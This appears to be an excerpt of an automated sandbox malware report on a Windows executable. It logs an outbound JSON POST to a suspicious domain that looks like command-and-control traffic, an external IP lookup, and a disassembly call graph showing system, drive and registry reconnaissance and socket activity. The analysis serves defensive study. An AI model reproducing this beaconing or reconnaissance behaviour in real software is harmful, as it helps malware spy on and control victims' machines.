                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.449732147.45.113.159807600C:\Users\user\Desktop\1o81tDUu5M.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 20, 2024 16:37:58.829854965 CET287OUTPOST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                            Host: home.twentytk20pn.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 143
                                                            Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                            Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                            Dec 20, 2024 16:38:00.259150982 CET212INHTTP/1.0 503 Service Unavailable
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.44973034.226.108.1554437600C:\Users\user\Desktop\1o81tDUu5M.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-20 15:37:54 UTC52OUTGET /ip HTTP/1.1
                                                            Host: httpbin.org
                                                            Accept: */*
                                                            2024-12-20 15:37:54 UTC224INHTTP/1.1 200 OK
                                                            Date: Fri, 20 Dec 2024 15:37:54 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 31
                                                            Connection: close
                                                            Server: gunicorn/19.9.0
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Credentials: true
                                                            2024-12-20 15:37:54 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                            Data Ascii: { "origin": "8.46.123.189"}


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:10:37:48
                                                            Start date:20/12/2024
                                                            Path:C:\Users\user\Desktop\1o81tDUu5M.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\1o81tDUu5M.exe"
                                                            Imagebase:0x930000
                                                            File size:4'456'448 bytes
                                                            MD5 hash:3FBE557C7EC8409F30604B0F5E365F70
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:2.8%
                                                              Dynamic/Decrypted Code Coverage:4.7%
                                                              Signature Coverage:11%
                                                              Total number of Nodes:534
                                                              Total number of Limit Nodes:90
                                                              execution_graph 61682 9331d7 61683 9331f4 61682->61683 61684 933200 61683->61684 61688 933223 61683->61688 61689 9315b0 _lock 61684->61689 61686 93321e 61687 9332dc CloseHandle 61687->61686 61688->61687 61689->61686 61690 932f17 61698 932f2c 61690->61698 61691 9331d3 61692 932fb3 RegOpenKeyExA 61692->61698 61693 93315c RegEnumKeyExA 61694 9331b2 RegCloseKey 61693->61694 61693->61698 61694->61698 61695 933046 RegOpenKeyExA 61696 933089 RegQueryValueExA 61695->61696 61695->61698 61697 93313b RegCloseKey 61696->61697 61696->61698 61697->61698 61698->61691 61698->61692 61698->61693 61698->61695 61698->61697 61699 968b50 61700 968b6b 61699->61700 61718 968be6 61699->61718 61701 968bf3 61700->61701 61702 968b8f 61700->61702 61700->61718 61732 96a550 61701->61732 61803 946e40 select __WSAFDIsSet __WSAFDIsSet __WSAFDIsSet 61702->61803 61706 968cd9 SleepEx 61717 968d13 61706->61717 61707 968e85 61711 968eae 61707->61711 61707->61718 61809 942a00 _open 61707->61809 61708 968c35 61791 96a150 61708->61791 61709 968c1f connect 61709->61708 61710 96a150 2 API calls 61719 968dff 61710->61719 61711->61718 61810 9378b0 closesocket 61711->61810 61714 968cb2 61714->61707 61714->61710 61714->61718 61716 968d43 61724 96a150 2 API calls 61716->61724 61717->61714 61717->61716 61719->61707 61807 94d090 _open 61719->61807 61722 968dc8 61806 96b100 _open 61722->61806 61723 968ba1 61723->61706 61723->61714 61731 968bb5 61723->61731 61724->61731 61726 968e67 61808 974fd0 _open 61726->61808 61730 968c8b 61730->61722 61730->61723 61731->61718 61805 9750a0 _open 61731->61805 61733 96a575 61732->61733 61735 96a597 61733->61735 61814 9375e0 61733->61814 61785 96a6d9 61735->61785 61826 96ef30 61735->61826 61737 96a709 61739 9378b0 2 API calls 61737->61739 61747 96a713 61737->61747 61739->61747 61740 968bfc 61740->61708 61740->61709 61740->61714 61740->61718 61742 96a7e5 61746 96a811 setsockopt 61742->61746 61752 96a87c 61742->61752 61762 96a8ee 61742->61762 61743 96a641 61743->61742 61840 974fd0 _open 61743->61840 61746->61752 61754 96a83b 61746->61754 61747->61740 61839 9750a0 _open 61747->61839 61748 96a69b 61836 94d090 _open 61748->61836 61750 96a6c9 61837 974f40 _open 61750->61837 61752->61762 61843 96b1e0 _open 61752->61843 61754->61752 61841 94d090 _open 61754->61841 61757 96af56 61758 96af5d 61757->61758 61757->61785 61758->61747 61761 96a150 2 API calls 61758->61761 61759 96a86d 61842 974fd0 _open 61759->61842 61761->61747 61763 96abb9 61762->61763 61765 96ae32 61762->61765 61766 96acb8 61762->61766 61774 96af33 61762->61774 61782 96abe1 61762->61782 61762->61785 61768 96ad45 61763->61768 61770 96ade6 61763->61770 61763->61782 61845 966be0 14 API calls 61763->61845 61764 96b056 61854 94d090 _open 61764->61854 61765->61763 61851 974fd0 _open 61765->61851 61766->61763 61776 96acdc 61766->61776 61766->61785 61767 96af03 61767->61774 61852 974fd0 _open 61767->61852 61768->61770 61773 96ad5f 61768->61773 61849 94d090 _open 61770->61849 61846 9820d0 _open 61773->61846 61835 9967e0 ioctlsocket 61774->61835 61844 94d090 _open 61776->61844 61779 96b07b 61855 974f40 _open 61779->61855 61780 96ad7b 61783 96adb7 61780->61783 61847 974fd0 _open 61780->61847 61782->61764 61782->61767 61782->61785 61853 974fd0 _open 61782->61853 61848 983030 _open 61783->61848 61785->61737 61785->61747 61838 942a00 _open 61785->61838 61788 96ad01 61850 974f40 _open 61788->61850 61792 96a15f 61791->61792 61800 968c4d 61791->61800 61793 96a181 getsockname 61792->61793 61792->61800 61794 96a1f7 61793->61794 61795 96a1d0 61793->61795 61796 96ef30 _open 61794->61796 61862 94d090 _open 61795->61862 61797 96a20f 61796->61797 61797->61800 61863 94d090 _open 61797->61863 61800->61730 61804 9750a0 _open 61800->61804 61802 96a1eb 61864 974f40 _open 61802->61864 61803->61723 61804->61730 61805->61718 61806->61714 61807->61726 61808->61707 61809->61711 61811 9378c5 61810->61811 61812 9378d7 61810->61812 61865 9372a0 _open 61811->61865 61812->61718 61815 937607 socket 61814->61815 61816 9375ef 61814->61816 61817 93762b 61815->61817 61818 93763a 61815->61818 61816->61815 61819 937643 61816->61819 61820 937601 61816->61820 61856 9372a0 _open 61817->61856 61818->61735 61857 9372a0 _open 61819->61857 61820->61815 61823 937654 61858 93cb20 _open 61823->61858 61825 937674 61825->61735 61827 96ef47 61826->61827 61828 96efa8 61826->61828 61829 96ef81 61827->61829 61830 96ef4c 61827->61830 61832 96a63a 61828->61832 61861 93c960 _open 61828->61861 61860 993d10 _open 61829->61860 61830->61832 61859 993d10 _open 61830->61859 61832->61743 61832->61748 61835->61757 61836->61750 61837->61785 61838->61737 61839->61740 61840->61742 61841->61759 61842->61752 61843->61762 61844->61788 61845->61768 61846->61780 61847->61783 61848->61782 61849->61788 61850->61785 61851->61763 61852->61774 61853->61782 61854->61779 61855->61785 61856->61818 61857->61823 61858->61825 61859->61832 61860->61832 61861->61832 61862->61802 61863->61802 61864->61800 61865->61812 62158 9695b0 62159 9695fd 62158->62159 62160 9695c8 62158->62160 62160->62159 62161 96a150 2 API calls 62160->62161 62161->62159 62162 966ab0 62164 966ad5 62162->62164 62163 966bb4 62165 9e5ed0 9 API calls 62163->62165 62164->62163 62166 946fa0 4 API calls 62164->62166 62167 966ba9 62165->62167 62168 966b54 62166->62168 62168->62163 62168->62167 62169 966b5d 62168->62169 62169->62167 62171 9e5ed0 62169->62171 62174 9e5a50 62171->62174 62173 9e5ee5 62173->62169 62175 9e5a58 62174->62175 62179 9e5ea0 62174->62179 62176 9e5b50 62175->62176 62188 9e5a99 62175->62188 62189 9e5b88 62175->62189 62180 9e5b7a 62176->62180 62181 9e5eb4 62176->62181 62176->62189 62177 9e5e96 62209 9f9480 socket ioctlsocket connect getsockname closesocket 62177->62209 62179->62173 62199 9e70a0 62180->62199 62210 9e6f10 socket ioctlsocket connect getsockname closesocket 62181->62210 62185 9e5ec2 62185->62185 62186 9e5be2 __WSAFDIsSet 62186->62188 62187 9e5da1 __WSAFDIsSet 62193 9e5cae 62187->62193 62188->62186 62188->62189 62191 9e70a0 6 API calls 62188->62191 62206 9e6f10 socket ioctlsocket connect getsockname closesocket 62188->62206 62189->62193 62207 9e5ef0 socket ioctlsocket connect getsockname 62189->62207 62191->62188 62193->62177 62193->62187 62195 9fa920 62193->62195 62208 9f9320 socket ioctlsocket connect getsockname closesocket 62193->62208 62196 9fa944 62195->62196 62197 9fa94b 62196->62197 62198 9fa977 send 62196->62198 62197->62193 62198->62193 62202 9e70ae 62199->62202 62201 9e71a7 62201->62189 62202->62201 62203 9e717f 62202->62203 62211 9fa8c0 62202->62211 62215 9e71c0 socket ioctlsocket connect getsockname 62202->62215 62203->62201 62216 9f9320 socket ioctlsocket connect getsockname closesocket 62203->62216 62206->62188 62207->62189 62208->62193 62209->62179 62210->62185 62212 9fa8e6 62211->62212 62213 9fa903 recvfrom 62211->62213 62212->62213 62214 9fa8ed 62212->62214 62213->62214 62214->62202 62215->62202 62216->62201 62217 d6d270 62242 cbdd30 62217->62242 62219 d6d29a 62220 d6d2a6 62219->62220 62245 cb8f70 62219->62245 62225 d6d2e6 62226 cb8f70 _open 62227 d6d2ef 62226->62227 62256 d6d490 62227->62256 62229 d6d30f 62231 d6d31e 62229->62231 62267 cc7e00 62229->62267 62232 d6d36d 62231->62232 62233 cb8f70 _open 62231->62233 62234 d6d402 62233->62234 62272 d74910 _open 62234->62272 62236 d6d43a 62237 d74780 _open 62236->62237 62238 d6d456 62237->62238 62239 d6d47e 62238->62239 62240 cb8f70 _open 62238->62240 62241 d6d48c 62240->62241 62273 cc7410 62242->62273 62244 cbdd41 62244->62219 62277 cb8e90 _open 62245->62277 62247 cb8f82 62248 cb8e90 _open 62247->62248 62249 cb8fa2 62248->62249 62250 cb8f70 _open 62249->62250 62251 cb8fb8 62250->62251 62252 cc12a0 62251->62252 62253 cc12ac 62252->62253 62279 cbe030 62253->62279 62255 cc12da 62255->62225 62255->62226 62259 d6d4da 62256->62259 62257 d6d4f3 62257->62229 62258 cb8f70 _open 62260 d6d536 62258->62260 62259->62257 62259->62258 62261 d6d5e0 62260->62261 62263 d6d596 62260->62263 62284 cbb4e0 _lock 62261->62284 62262 d6d5d4 62262->62229 62263->62262 62285 cbb4e0 _lock 62263->62285 62265 d6d609 62265->62229 62268 cc7e1e 62267->62268 62269 cc7eec 62268->62269 62270 cb8f70 _open 62268->62270 62269->62231 62271 cc7efb 62270->62271 62274 cc7424 62273->62274 62275 cc7438 62274->62275 62276 cc745c _lock 62274->62276 62275->62244 62276->62244 62278 cb8eba 62277->62278 62278->62247 62280 cbe07d 62279->62280 62281 cbe16e 62280->62281 62283 cbb180 islower islower 62280->62283 62281->62255 62283->62280 62284->62265 62285->62265 62286 cbb160 Sleep 62287 9329ff FindFirstFileA 62288 932a31 62287->62288 62289 932a5c RegOpenKeyExA 62288->62289 62290 932a93 62289->62290 62291 932ade CharUpperA 62290->62291 62292 932b0a 62291->62292 62293 932bf9 QueryFullProcessImageNameA 62292->62293 62294 932c3b CloseHandle 62293->62294 62296 932c64 62294->62296 62295 932df1 CloseHandle 62297 932e23 62295->62297 62296->62295 61866 933d5e 61867 933d30 61866->61867 61867->61866 61868 933d90 61867->61868 61872 940ab0 61867->61872 61875 93fcb0 10 API calls 61868->61875 61871 933dc1 61876 9405b0 61872->61876 61875->61871 61877 9407c7 61876->61877 61886 9405bd 61876->61886 61877->61867 61878 94066a 61895 96dec0 61878->61895 61882 94067b 61885 9406f0 61882->61885 61891 9407ce 61882->61891 61902 9473b0 _open 61882->61902 61887 940707 WSAEventSelect 61885->61887 61888 9407ef 61885->61888 61903 9376a0 61885->61903 61886->61877 61886->61878 61886->61891 61900 9403c0 _open 61886->61900 61901 947450 _open 61886->61901 61887->61885 61887->61891 61888->61891 61893 940847 61888->61893 61915 946fa0 61888->61915 61914 947380 _open 61891->61914 61892 9409e8 WSAEnumNetworkEvents 61892->61893 61894 9409d0 WSAEventSelect 61892->61894 61893->61891 61893->61892 61893->61894 61894->61892 61894->61893 61896 96df1e 61895->61896 61898 96dece 61895->61898 61923 96df30 61898->61923 61899 96def9 61899->61882 61900->61886 61901->61886 61902->61882 61904 9376c0 61903->61904 61905 9376e6 send 61903->61905 61904->61905 61906 9376c9 61904->61906 61909 937704 61905->61909 61911 9376d3 61905->61911 61907 93770b 61906->61907 61906->61911 61932 9372a0 _open 61907->61932 61909->61885 61931 9372a0 _open 61911->61931 61912 93771c 61933 93cb20 _open 61912->61933 61914->61877 61916 946fd4 61915->61916 61917 946feb 61915->61917 61916->61917 61918 947207 select 61916->61918 61917->61893 61918->61917 61922 947233 61918->61922 61919 94726b __WSAFDIsSet 61920 94729a __WSAFDIsSet 61919->61920 61919->61922 61921 9472ba __WSAFDIsSet 61920->61921 61920->61922 61921->61922 61922->61917 61922->61919 61922->61920 61922->61921 61924 96df44 61923->61924 61926 96dfb9 61924->61926 61928 96dfb5 61924->61928 61929 947450 _open 61924->61929 61930 947380 _open 61926->61930 61928->61899 61929->61924 61930->61928 61931->61909 61932->61912 61933->61909 62298 941139 62314 96baa0 62298->62314 62300 941148 62301 941512 62300->62301 62303 941161 62300->62303 62305 941527 62301->62305 62319 93fec0 10 API calls 62301->62319 62311 940f00 62303->62311 62318 940150 _open 62303->62318 62305->62311 62320 9422d0 10 API calls 62305->62320 62308 940150 _open 62308->62311 62309 940f7b 62311->62308 62311->62309 62313 9375a0 _open 62311->62313 62321 96d4d0 6 API calls 62311->62321 62322 944940 _open 62311->62322 62323 943900 _open 62311->62323 62313->62311 62315 96bb60 62314->62315 62317 96bac7 62314->62317 62315->62300 62317->62315 62324 9505b0 _open 62317->62324 62318->62311 62319->62305 62320->62311 62321->62311 62322->62311 62323->62311 62324->62315 61934 93255d 61957 cb9f70 61934->61957 61937 932589 61938 9325a0 GlobalMemoryStatusEx 61937->61938 61939 9325ec 61938->61939 61959 6d903cb 61939->61959 61963 6d90284 61939->61963 61967 6d902fb 61939->61967 61971 6d90398 61939->61971 61975 6d90386 61939->61975 61979 6d902de 61939->61979 61983 6d90245 61939->61983 61987 6d903fb 61939->61987 61958 93256c GetSystemInfo 61957->61958 61958->61937 61960 6d903c7 61959->61960 61960->61959 61961 6d9049e GetLogicalDrives 61960->61961 61962 6d904be 61961->61962 61964 6d90290 GetLogicalDrives 61963->61964 61966 6d904be 61964->61966 61968 6d90338 GetLogicalDrives 61967->61968 61970 6d904be 61968->61970 61972 6d903d5 GetLogicalDrives 61971->61972 61974 6d904be 61972->61974 61976 6d9038a GetLogicalDrives 61975->61976 61978 6d904be 61976->61978 61980 6d902eb GetLogicalDrives 61979->61980 61982 6d904be 61980->61982 61984 6d90268 GetLogicalDrives 61983->61984 61986 6d904be 61984->61986 61988 6d90404 GetLogicalDrives 61987->61988 61990 6d904be 61988->61990 62325 94d5e0 62326 94d5f0 62325->62326 62327 94d652 WSAStartup 62325->62327 62330 94d67c 62326->62330 62332 94d690 _open 62326->62332 62327->62326 62328 94d664 62327->62328 62331 94d5fa 62332->62331 61991 96f6c3 61994 96f6e3 61991->61994 61998 96f7b9 61991->61998 61992 96f72e 61993 96f7f4 61992->61993 62003 96f743 61992->62003 61995 96f800 61993->61995 62011 970c80 _open 61993->62011 61994->61992 62007 9750a0 _open 61994->62007 61998->61994 61998->61995 62010 974fd0 _open 61998->62010 61999 970034 62003->61995 62004 9750a0 _open 62003->62004 62008 93fa50 _open 62003->62008 62009 970d30 _open 62003->62009 62004->62003 62005 96ff5b 62005->61999 62012 9750a0 _open 62005->62012 62007->61992 62008->62003 62009->62003 62010->61994 62011->62005 62012->61999 62013 96b3c0 62014 96b3ee 62013->62014 62015 96b3cb 62013->62015 62017 9376a0 2 API calls 62015->62017 62019 969290 62015->62019 62016 96b3ea 62017->62016 62020 9376a0 2 API calls 62019->62020 62021 9692e5 62020->62021 62022 9693c3 62021->62022 62024 9692f3 62021->62024 62027 969392 62022->62027 62033 94d090 _open 62022->62033 62023 9693be 62023->62016 62024->62027 62028 969335 WSAIoctl 62024->62028 62026 9693f7 62034 974f40 _open 62026->62034 62027->62023 62035 9750a0 _open 62027->62035 62028->62027 62031 969366 62028->62031 62031->62027 62032 969371 setsockopt 62031->62032 62032->62027 62033->62026 62034->62027 62035->62023 62036 96e400 62037 96e412 62036->62037 62043 96e459 62036->62043 62038 96e422 62037->62038 62060 983030 _open 62037->62060 62061 9909d0 _open 62038->62061 62041 96e42b 62062 9668b0 6 API calls 62041->62062 62042 96e4a8 62043->62042 62046 96e495 62043->62046 62048 96b5a0 62043->62048 62046->62042 62047 96b5a0 _open 62046->62047 62047->62042 62049 96b5c0 62048->62049 62052 96b5d2 62048->62052 62050 96b713 62049->62050 62049->62052 62055 96b626 62049->62055 62064 974f40 _open 62050->62064 62052->62046 62053 96b65a 62053->62052 62054 96b72b 62053->62054 62056 96b737 62053->62056 62054->62052 62065 9750a0 _open 62054->62065 62055->62052 62055->62053 62055->62054 62055->62056 62063 9750a0 _open 62055->62063 62056->62052 62066 9750a0 _open 62056->62066 62060->62038 62061->62041 62062->62043 62063->62055 62064->62052 62065->62052 62066->62052 62067 96b400 62068 96b425 62067->62068 62069 96b40b 62067->62069 62072 937770 62069->62072 62070 96b421 62073 937790 62072->62073 62074 9377b6 recv 62072->62074 62073->62074 62075 937799 62073->62075 62076 9377a3 62074->62076 62082 9377d4 62074->62082 62075->62076 62077 9377db 62075->62077 62083 9372a0 _open 62076->62083 62084 9372a0 _open 62077->62084 62080 9377ec 62085 93cb20 _open 62080->62085 62082->62070 62083->62082 62084->62080 62085->62082 62086 970700 62087 97099d 62086->62087 62090 970719 62086->62090 62090->62087 62091 9709f6 62090->62091 62093 9709b5 62090->62093 62095 970a35 62090->62095 62104 937310 _open 62090->62104 62105 96b8e0 _open 62090->62105 62106 99f570 _open 62090->62106 62107 95eb30 _open 62090->62107 62108 9913a0 _open 62090->62108 62109 9b39a0 _open 62090->62109 62110 95eae0 _open 62090->62110 62112 9375a0 62091->62112 62093->62087 62111 9750a0 _open 62093->62111 62116 974f40 _open 62095->62116 62102 9375a0 _open 62102->62087 62104->62090 62105->62090 62106->62090 62107->62090 62108->62090 62109->62090 62110->62090 62111->62087 62113 9375aa 62112->62113 62115 9375d1 62112->62115 62113->62115 62117 9372a0 _open 62113->62117 62115->62102 62116->62087 62117->62115 62118 9313c9 62120 931160 62118->62120 62121 9313a1 62120->62121 62122 cb8a20 _open islower islower _lock 62120->62122 62122->62120 62123 9e3c00 62124 9e3c23 62123->62124 62126 9e3c0d 62123->62126 62124->62126 62127 9fb180 62124->62127 62128 9fb19b 62127->62128 62134 9fb2e3 62127->62134 62131 9fb2a9 getsockname 62128->62131 62133 9fb020 closesocket 62128->62133 62128->62134 62135 9faf30 62128->62135 62139 9fb060 62128->62139 62144 9fb020 62131->62144 62133->62128 62134->62126 62136 9faf4c 62135->62136 62137 9faf63 socket 62135->62137 62136->62137 62138 9faf52 62136->62138 62137->62128 62138->62128 62143 9fb080 62139->62143 62140 9fb0b0 connect 62141 9fb0bf WSAGetLastError 62140->62141 62142 9fb0ea 62141->62142 62141->62143 62142->62128 62143->62140 62143->62141 62143->62142 62145 9fb029 62144->62145 62146 9fb052 62144->62146 62147 9fb04b closesocket 62145->62147 62148 9fb03e 62145->62148 62146->62128 62147->62146 62148->62128 62333 9e4720 62337 9e4728 62333->62337 62334 9e4733 62336 9e4774 62337->62334 62344 9e476c 62337->62344 62345 9e5540 socket ioctlsocket connect getsockname closesocket 62337->62345 62339 9e482e 62339->62344 62346 9e9270 62339->62346 62341 9e4860 62351 9e4950 62341->62351 62343 9e4878 62344->62343 62357 9e30a0 socket ioctlsocket connect getsockname closesocket 62344->62357 62345->62339 62358 9ea440 62346->62358 62348 9e92ab 62348->62341 62349 9e9297 62349->62348 62386 9ebbe0 socket ioctlsocket connect getsockname closesocket 62349->62386 62352 9e4966 62351->62352 62355 9e49b9 62352->62355 62356 9e49c5 62352->62356 62387 9ebbe0 socket ioctlsocket connect getsockname closesocket 62352->62387 62353 9e4aa0 gethostname 62353->62355 62353->62356 62355->62353 62355->62356 62356->62344 62357->62336 62384 9ea46b 62358->62384 62359 9eaa03 RegOpenKeyExA 62360 9eaa27 RegQueryValueExA 62359->62360 62361 9eab70 RegOpenKeyExA 62359->62361 62362 9eaacc RegQueryValueExA 62360->62362 62363 9eaa71 62360->62363 62364 9eac34 RegOpenKeyExA 62361->62364 62381 9eab90 62361->62381 62366 9eab0e 62362->62366 62367 9eab66 RegCloseKey 62362->62367 62363->62362 62370 9eaa85 RegQueryValueExA 62363->62370 62365 9eacf8 RegOpenKeyExA 62364->62365 62383 9eac54 62364->62383 62368 9ead56 RegEnumKeyExA 62365->62368 62371 9ead14 62365->62371 62366->62367 62374 9eab1e RegQueryValueExA 62366->62374 62367->62361 62369 9ead9b 62368->62369 62368->62371 62372 9eae16 RegOpenKeyExA 62369->62372 62373 9eaab3 62370->62373 62371->62349 62375 9eaddf RegEnumKeyExA 62372->62375 62376 9eae34 RegQueryValueExA 62372->62376 62373->62362 62378 9eab4c 62374->62378 62375->62371 62375->62372 62377 9eaf43 RegQueryValueExA 62376->62377 62385 9eadaa 62376->62385 62379 9eb052 RegQueryValueExA 62377->62379 62377->62385 62378->62367 62380 9eadc7 RegCloseKey 62379->62380 62379->62385 62380->62375 62381->62364 62382 9eafa0 RegQueryValueExA 62382->62385 62383->62365 62384->62359 62384->62371 62385->62377 62385->62379 62385->62380 62385->62382 62386->62348 62387->62355 62149 9fa080 62152 9f9740 62149->62152 62151 9fa09b 62153 9f9780 62152->62153 62157 9f975d 62152->62157 62154 9f9925 RegOpenKeyExA 62153->62154 62153->62157 62155 9f995a RegQueryValueExA 62154->62155 62154->62157 62156 9f9986 RegCloseKey 62155->62156 62156->62157 62157->62151

                                                              Executed Functions

                                                              Function 0093255D Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 282fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSystemInfo.KERNELBASE ref: 00932579
                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 009325CC
                                                              • GetDriveTypeA.KERNELBASE ref: 00932647
                                                              • GetDiskFreeSpaceExA.KERNELBASE ref: 0093267E
                                                              • KiUserCallbackDispatcher.NTDLL ref: 009327E2
                                                              • FindFirstFileW.KERNELBASE ref: 009328F8
                                                              • FindNextFileW.KERNELBASE ref: 0093291F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                              • String ID: @$`
                                                              • API String ID: 3271271169-3318628307
                                                              • Opcode ID: e83f45b9d64bda700c6565a276362898be3a774984bf43f189f56bf05fc9c19c
                                                              • Instruction ID: ea3a651d1149a9761d7840bcc016c472a591da6113a199980f177d8b70b8c66f
                                                              • Opcode Fuzzy Hash: e83f45b9d64bda700c6565a276362898be3a774984bf43f189f56bf05fc9c19c
                                                              • Instruction Fuzzy Hash: 00D1B3B49057099FCB10EF68D98569EBBF0FF48354F00896EE89897350E7749A84CF62
                                                              Function 009329FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 927 9329ff-932a2f FindFirstFileA 928 932a31-932a36 927->928 929 932a38 927->929 930 932a3d-932a91 call d6f8d0 call d6f960 RegOpenKeyExA 928->930 929->930 935 932a93-932a98 930->935 936 932a9a 930->936 937 932a9f-932b0c call d6f8d0 call d6f960 CharUpperA call cb8da0 935->937 936->937 945 932b15 937->945 946 932b0e-932b13 937->946 947 932b1a-932b92 call d6f8d0 call d6f960 call cb8e80 call cb8e70 945->947 946->947 956 932b94-932ba3 947->956 957 932bcc-932c66 QueryFullProcessImageNameA CloseHandle call cb8da0 947->957 960 932bb0-932bca call cb8e68 956->960 961 932ba5-932bae 956->961 967 932c68-932c6d 957->967 968 932c6f 957->968 960->956 960->957 961->957 969 932c74-932ce9 call d6f8d0 call d6f960 call cb8e80 call cb8e70 967->969 968->969 978 932dcf-932e1c call d6f8d0 call d6f960 CloseHandle 969->978 979 932cef-932d49 call cb8bb0 call cb8da0 969->979 989 932e23-932e2e 978->989 990 932d4b-932d63 call cb8da0 979->990 991 932d99-932dad 979->991 992 932e30-932e35 989->992 993 932e37 989->993 990->991 1000 932d65-932d7d call cb8da0 990->1000 991->978 995 932e3c-932ed6 call d6f8d0 call d6f960 992->995 993->995 1008 932eea 995->1008 1009 932ed8-932ee1 995->1009 1000->991 1005 932d7f-932d97 call cb8da0 1000->1005 1005->991 1013 932daf-932dc9 call cb8e68 1005->1013 1012 932eef-932f16 call d6f8d0 call d6f960 1008->1012 1009->1008 1011 932ee3-932ee8 1009->1011 1011->1012 1013->978 1013->979
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
